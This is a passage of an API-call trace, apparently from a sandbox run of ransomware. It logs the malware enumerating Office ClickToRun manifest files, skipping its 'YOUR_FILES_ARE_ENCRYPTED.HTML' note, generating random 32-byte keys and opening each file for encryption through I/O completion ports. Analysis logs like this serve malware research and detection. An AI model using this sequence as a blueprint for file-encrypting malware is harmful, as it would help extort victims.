lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Proof.Culture.msi.16.fr-fr.xml" [0156.469] CreateIoCompletionPort (FileHandle=0x5a4, ExistingCompletionPort=0x3a0, CompletionKey=0x744a1c0, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.469] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x744a1c0, lpOverlapped=0x744a1c0) returned 1 [0156.469] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77f96b10, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x7fa, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.proofing.msi.16.en-us.xml", cAlternateFileName="C24618~1.XML")) returned 1 [0156.469] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml") returned 116 [0156.469] lstrcmpW (lpString1="C2RManifest.proofing.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.469] PathFindExtensionW (pszPath="C2RManifest.proofing.msi.16.en-us.xml") returned=".xml" [0156.469] lstrlenW (lpString=".xml") returned 4 [0156.469] PathFindExtensionW (pszPath="C2RManifest.proofing.msi.16.en-us.xml") returned=".xml" [0156.469] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.469] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.proofing.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0156.470] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=2042) returned 1 [0156.470] GetProcessHeap () returned 0x270000 [0156.470] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x7472318 [0156.472] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="CF") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="76") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E5") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="2C") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="0D") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="B3") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="C9") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="8B") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="8E") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="B1") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="6C") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="B2") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="6C") returned 2 [0156.472] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="7D") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="BF") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="88") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="E0") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="2A") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="5E") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="10") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="57") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="C1") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="C3") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="BB") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="2E") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="40") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="24") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="FE") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="13") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="C5") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="F1") returned 2 [0156.473] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="5B") returned 2 [0156.474] lstrcpyW (in: lpString1=0x74823cc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.proofing.msi.16.en-us.xml" [0156.474] CreateIoCompletionPort (FileHandle=0x5a0, ExistingCompletionPort=0x3a0, CompletionKey=0x7472318, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.474] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x7472318, lpOverlapped=0x7472318) returned 1 [0156.474] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92d18cb0, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92d18cb0, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77611310, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x12d6e, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", cAlternateFileName="C2C6D1~1.XML")) returned 1 [0156.474] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned 135 [0156.474] lstrcmpW (lpString1="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.474] PathFindExtensionW (pszPath="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned=".xml" [0156.474] lstrlenW (lpString=".xml") returned 4 [0156.474] PathFindExtensionW (pszPath="C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned=".xml" [0156.474] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.474] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publisher.publisher.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.475] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=77166) returned 1 [0156.475] GetProcessHeap () returned 0x270000 [0156.475] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x74ea160 [0156.479] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="6F") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="2A") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="D0") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="93") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="15") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="96") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="99") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="B0") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="06") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="87") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="72") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="CA") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="A7") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="4F") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="C6") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="76") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="29") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="DD") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="9A") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="DD") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="72") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="B3") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="84") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="22") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="75") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="F1") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="C7") returned 2 [0156.479] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="C2") returned 2 [0156.480] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="27") returned 2 [0156.480] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="BF") returned 2 [0156.480] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="85") returned 2 [0156.480] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="56") returned 2 [0156.534] lstrcpyW (in: lpString1=0x74fa214, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Publisher.Publisher.x-none.msi.16.x-none.xml" [0156.534] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x74ea160, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.534] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x74ea160, lpOverlapped=0x74ea160) returned 1 [0156.535] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92cf2b50, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92cf2b50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77efe590, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x3708, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.publishermui.msi.16.en-us.xml", cAlternateFileName="C2RMAN~4.XML")) returned 1 [0156.535] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml") returned 120 [0156.535] lstrcmpW (lpString1="C2RManifest.publishermui.msi.16.en-us.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.535] PathFindExtensionW (pszPath="C2RManifest.publishermui.msi.16.en-us.xml") returned=".xml" [0156.535] lstrlenW (lpString=".xml") returned 4 [0156.535] PathFindExtensionW (pszPath="C2RManifest.publishermui.msi.16.en-us.xml") returned=".xml" [0156.535] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.536] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.publishermui.msi.16.en-us.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.549] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=14088) returned 1 [0156.549] GetProcessHeap () returned 0x270000 [0156.549] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.553] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="67") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="9B") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="E0") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="6D") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="AA") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="0A") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="AA") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="75") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="2C") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="80") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="FE") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="DF") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="12") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="57") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="3D") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="0A") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="12") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="8A") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="EF") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="98") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="51") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="7A") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="40") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="BF") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="CB") returned 2 [0156.553] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="B3") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="1E") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="75") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="ED") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="2F") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="DA") returned 2 [0156.554] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="48") returned 2 [0156.554] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.publishermui.msi.16.en-us.xml" [0156.554] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.554] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.555] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92cf2b50, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92cf2b50, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x776cf9f0, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0xaac34, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~3.XML")) returned 1 [0156.555] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned 129 [0156.555] lstrcmpW (lpString1="C2RManifest.shared.Office.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.555] PathFindExtensionW (pszPath="C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned=".xml" [0156.555] lstrlenW (lpString=".xml") returned 4 [0156.556] PathFindExtensionW (pszPath="C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned=".xml" [0156.556] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.556] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.shared.office.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x598 [0156.573] GetFileSizeEx (in: hFile=0x598, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=699444) returned 1 [0156.573] GetProcessHeap () returned 0x270000 [0156.573] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x28150) returned 0x75e0048 [0156.577] wsprintfW (in: param_1=0x4ebda36, param_2="%02X" | out: param_1="9C") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda3a, param_2="%02X" | out: param_1="C8") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda3e, param_2="%02X" | out: param_1="F0") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda42, param_2="%02X" | out: param_1="D5") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda46, param_2="%02X" | out: param_1="84") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda4a, param_2="%02X" | out: param_1="7A") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda4e, param_2="%02X" | out: param_1="E5") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda52, param_2="%02X" | out: param_1="EB") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda56, param_2="%02X" | out: param_1="51") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda5a, param_2="%02X" | out: param_1="A4") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda5e, param_2="%02X" | out: param_1="37") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda62, param_2="%02X" | out: param_1="84") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda66, param_2="%02X" | out: param_1="21") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda6a, param_2="%02X" | out: param_1="D9") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda6e, param_2="%02X" | out: param_1="B2") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda72, param_2="%02X" | out: param_1="57") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda76, param_2="%02X" | out: param_1="2D") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda7a, param_2="%02X" | out: param_1="5D") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda7e, param_2="%02X" | out: param_1="4F") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda82, param_2="%02X" | out: param_1="87") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda86, param_2="%02X" | out: param_1="D6") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda8a, param_2="%02X" | out: param_1="5C") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda8e, param_2="%02X" | out: param_1="3D") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda92, param_2="%02X" | out: param_1="C6") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda96, param_2="%02X" | out: param_1="8E") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda9a, param_2="%02X" | out: param_1="CC") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebda9e, param_2="%02X" | out: param_1="14") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebdaa2, param_2="%02X" | out: param_1="84") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebdaa6, param_2="%02X" | out: param_1="6E") returned 2 [0156.577] wsprintfW (in: param_1=0x4ebdaaa, param_2="%02X" | out: param_1="95") returned 2 [0156.578] wsprintfW (in: param_1=0x4ebdaae, param_2="%02X" | out: param_1="B8") returned 2 [0156.578] wsprintfW (in: param_1=0x4ebdab2, param_2="%02X" | out: param_1="37") returned 2 [0156.578] lstrcpyW (in: lpString1=0x75f00fc, lpString2="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" | out: lpString1="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml") returned="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.shared.Office.x-none.msi.16.x-none.xml" [0156.578] CreateIoCompletionPort (FileHandle=0x598, ExistingCompletionPort=0x3a0, CompletionKey=0x75e0048, NumberOfConcurrentThreads=0x0) returned 0x3a0 [0156.578] PostQueuedCompletionStatus (CompletionPort=0x3a0, dwNumberOfBytesTransferred=0x1, dwCompletionKey=0x75e0048, lpOverlapped=0x75e0048) returned 1 [0156.579] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x92c34470, ftCreationTime.dwHighDateTime=0x1d709b8, ftLastAccessTime.dwLowDateTime=0x92c34470, ftLastAccessTime.dwHighDateTime=0x1d709b8, ftLastWriteTime.dwLowDateTime=0x77afa070, ftLastWriteTime.dwHighDateTime=0x1d709b8, nFileSizeHigh=0x0, nFileSizeLow=0x15286, dwReserved0=0xfee9eaf7, dwReserved1=0xffffffff, cFileName="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", cAlternateFileName="C2RMAN~2.XML")) returned 1 [0156.579] wnsprintfW (in: pszDest=0x7400058, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned 125 [0156.579] lstrcmpW (lpString1="C2RManifest.Word.Word.x-none.msi.16.x-none.xml", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0156.579] PathFindExtensionW (pszPath="C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned=".xml" [0156.579] lstrlenW (lpString=".xml") returned 4 [0156.580] PathFindExtensionW (pszPath="C2RManifest.Word.Word.x-none.msi.16.x-none.xml") returned=".xml" [0156.580] SystemFunction036 (in: RandomBuffer=0x4ebdaf8, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebdaf8) returned 1 [0156.581] CreateFileW (lpFileName="\\\\?\\C:\\ProgramData\\Microsoft\\ClickToRun\\{9AC08E99-230B-47e8-9721-4577B7F124EA}\\C2RManifest.Word.Word.x-none.msi.16.x-none.xml" (normalized: "c:\\programdata\\microsoft\\clicktorun\\{9ac08e99-230b-47e8-9721-4577b7f124ea}\\c2rmanifest.word.word.x-none.msi.16.x-none.xml"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0x5a0 [0156.601] GetFileSizeEx (in: hFile=0x5a0, lpFileSize=0x4ebdb1c | out: lpFileSize=0x4ebdb1c*=86662) 